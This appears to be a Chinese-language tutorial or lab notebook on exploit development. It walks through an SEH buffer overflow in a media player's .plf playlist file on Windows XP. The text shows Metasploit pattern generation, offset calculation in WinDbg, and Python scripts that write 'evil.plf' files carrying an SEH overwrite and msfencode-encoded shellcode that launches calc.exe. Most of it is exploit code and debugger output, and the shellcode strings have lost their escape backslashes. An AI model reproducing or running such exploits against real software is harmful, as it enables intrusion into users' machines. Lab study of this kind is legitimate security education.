daniel@daniel-mint ~/msf/metasploit-framework/tools $ ruby pattern_create.rb 2000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co

生成定位pattern

根据pattern查找位置

0:000> db poi(fs:0)
0012f2c8  32 41 75 33 41 75 34 41-75 35 41 75 36 41 75 37  2Au3Au4Au5Au6Au7
0012f2d8  41 75 38 41 75 39 41 76-30 41 76 31 41 76 32 41  Au8Au9Av0Av1Av2A
0012f2e8  76 33 41 76 34 41 76 35-41 76 36 41 76 37 41 76  v3Av4Av5Av6Av7Av
0012f2f8  38 41 76 39 41 77 30 41-77 31 41 77 32 41 77 33  8Av9Aw0Aw1Aw2Aw3
0012f308  41 77 34 41 77 35 41 77-36 41 77 37 41 77 38 41  Aw4Aw5Aw6Aw7Aw8A
0012f318  77 39 41 78 30 41 78 31-41 78 32 41 78 33 41 78  w9Ax0Ax1Ax2Ax3Ax
0012f328  34 41 78 35 41 78 36 41-78 37 41 78 38 41 78 39  4Ax5Ax6Ax7Ax8Ax9
0012f338  41 79 30 41 79 31 41 79-32 41 79 33 41 79 34 41  Ay0Ay1Ay2Ay3Ay4A

  

Prelude> zip [1..100] ['a'..'z']
[(1,'a'),(2,'b'),(3,'c'),(4,'d'),(5,'e'),(6,'f'),(7,'g'),(8,'h'),(9,'i'),(10,'j'),(11,'k'),(12,'l'),(13,'m'),(14,'n'),(15,'o'),(16,'p'),(17,'q'),(18,'r'),(19,'s'),(20,'t'),(21,'u'),(22,'v'),(23,'w'),(24,'x'),(25,'y'),(26,'z')]

  

因此Au3-Aa0 = [u-a] * 10 + [3 – 0 ] = (21 – 1) * 10 + 3 = 203,即Au3是第203个三元组

所以2Au3是在203*3 = 609偏移处

或者

At9-Aa0 = [t – a + 1] * 10 = 200组,占据了600个字节,

Au0Au1Au2Au3

Prelude> zip [601..700] ['A','u','0','A','u','1','A','u','2','A','u','3']
[(601,'A'),(602,'u'),(603,'0'),(604,'A'),(605,'u'),(606,'1'),(607,'A'),(608,'u'),(609,'2'),(610,'A'),(611,'u'),(612,'3')]

  

因此是609偏移,或者说占据了609-612这四个字节。

 参考:http://www.fuzzysecurity.com/tutorials/expDev/3.html

filename=”evil.plf”

buffer = “A”*608 + “B”*4 + “C”*4 + “D”*(2000 – 608 – 8 – 8)

textfile = open(filename , ‘w’)
textfile.write(buffer)
textfile.close()

  

0:000> dd poi(fs:0)
0012f2c8  42424242 43434343 44444444 44444444
0012f2d8  44444444 44444444 44444444 44444444
0012f2e8  44444444 44444444 44444444 44444444
0012f2f8  44444444 44444444 44444444 44444444
0012f308  44444444 44444444 44444444 44444444
0012f318  44444444 44444444 44444444 44444444
0012f328  44444444 44444444 44444444 44444444
0012f338  44444444 44444444 44444444 44444444

  

filename="evil1.plf"
 
buf = "A"*608 + "xebx06x90x90" + "xb6xf7x47x00"
buf += "xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8b"
buf += "x52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7"
buf += "x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20"
buf += "xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8b"
buf += "x42x3cx01xd0x8bx40x78x85xc0x74x4ax01xd0"
buf += "x50x8bx48x18x8bx58x20x01xd3xe3x3cx49x8b"
buf += "x34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01"
buf += "xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2"
buf += "x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1c"
buf += "x01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5b"
buf += "x61x59x5ax51xffxe0x58x5fx5ax8bx12xebx86"
buf += "x5dx6ax01x8dx85xb9x00x00x00x50x68x31x8b"
buf += "x6fx87xffxd5xbbxf0xb5xa2x56x68xa6x95xbd"
buf += "x9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbb"
buf += "x47x13x72x6fx6ax00x53xffxd5x63x61x6cx63"
buf += "x2ex65x78x65x00"
buf += "D"*(2000 - 608 - 8 - 8 - 200)

  
textfile = open(filename , 'w')
textfile.write(buf)
textfile.close()

  

这种方式,并没有exploit成功,原因是shellcode中不能有x00,这会使字符串截止,而且msfpayload生成的payload中也包含x00,也无法使用。

因此需要使用msfencode进行加密,

daniel@daniel-mint ~/msf/metasploit-framework $ ruby msfpayload windows/exec CMD=calc.exe R | ruby msfencode -b 'x00x0dx0ax1a' -t python -e x86/call4_dword_xor 
WARNING: Nokogiri was built against LibXML version 2.8.0, but has dynamically loaded 2.9.1WARNING: Nokogiri was built against LibXML version 2.8.0, but has dynamically loaded 2.9.1

[*] x86/call4_dword_xor succeeded with size 224 (iteration=1)

buf =  ""
buf += "x2bxc9x83xe9xcexe8xffxffxffxffxc0x5ex81"
buf += "x76x0exdcx84x22x40x83xeexfcxe2xf4x20x6c"
buf += "xabx40xdcx84x42xc9x39xb5xf0x24x57xd6x12"
buf += "xcbx8ex88xa9x12xc8x0fx50x68xd3x33x68x66"
buf += "xedx7bx13x80x70xb8x43x3cxdexa8x02x81x13"
buf += "x89x23x87x3ex74x70x17x57xd6x32xcbx9exb8"
buf += "x23x90x57xc4x5axc5x1cxf0x68x41x0cxd4xa9"
buf += "x08xc4x0fx7ax60xddx57xc1x7cx95x0fx16xcb"
buf += "xddx52x13xbfxedx44x8ex81x13x89x23x87xe4"
buf += "x64x57xb4xdfxf9xdax7bxa1xa0x57xa2x84x0f"
buf += "x7ax64xddx57x44xcbxd0xcfxa9x18xc0x85xf1"
buf += "xcbxd8x0fx23x90x55xc0x06x64x87xdfx43x19"
buf += "x86xd5xddxa0x84xdbx78xcbxcex6fxa4x1dxb6"
buf += "x85xafxc5x65x84x22x40x8cxecx13xcbxb3x03"
buf += "xddx95x67x74x97xe2x8axecx84xd5x61x19xdd"
buf += "x95xe0x82x5ex4ax5cx7fxc2x35xd9x3fx65x53"
buf += "xaexebx48x40x8fx7bxf7x23xbdxe8x41x6exb9"
buf += "xfcx47x40"

  

然后写入shellcode

filename="evil1.plf"
 
buf = "A"*608 + "xebx06x90x90" + "xedx7ax03x64"
buf += "x90"*20
buf += "x2bxc9x83xe9xcexe8xffxffxffxffxc0x5ex81"
buf += "x76x0exdcx84x22x40x83xeexfcxe2xf4x20x6c"
buf += "xabx40xdcx84x42xc9x39xb5xf0x24x57xd6x12"
buf += "xcbx8ex88xa9x12xc8x0fx50x68xd3x33x68x66"
buf += "xedx7bx13x80x70xb8x43x3cxdexa8x02x81x13"
buf += "x89x23x87x3ex74x70x17x57xd6x32xcbx9exb8"
buf += "x23x90x57xc4x5axc5x1cxf0x68x41x0cxd4xa9"
buf += "x08xc4x0fx7ax60xddx57xc1x7cx95x0fx16xcb"
buf += "xddx52x13xbfxedx44x8ex81x13x89x23x87xe4"
buf += "x64x57xb4xdfxf9xdax7bxa1xa0x57xa2x84x0f"
buf += "x7ax64xddx57x44xcbxd0xcfxa9x18xc0x85xf1"
buf += "xcbxd8x0fx23x90x55xc0x06x64x87xdfx43x19"
buf += "x86xd5xddxa0x84xdbx78xcbxcex6fxa4x1dxb6"
buf += "x85xafxc5x65x84x22x40x8cxecx13xcbxb3x03"
buf += "xddx95x67x74x97xe2x8axecx84xd5x61x19xdd"
buf += "x95xe0x82x5ex4ax5cx7fxc2x35xd9x3fx65x53"
buf += "xaexebx48x40x8fx7bxf7x23xbdxe8x41x6exb9"
buf += "xfcx47x40"
buf += "D"*(2000 - 608 - 8 - 8 - 224-20)

  
textfile = open(filename , 'w')
textfile.write(buf)
textfile.close()

  

 用下面平台测试,exploit成功。

Exploit Development: Backtrack 5
Debugging Machine: Windows XP PRO SP3
Vulnerable Software: Download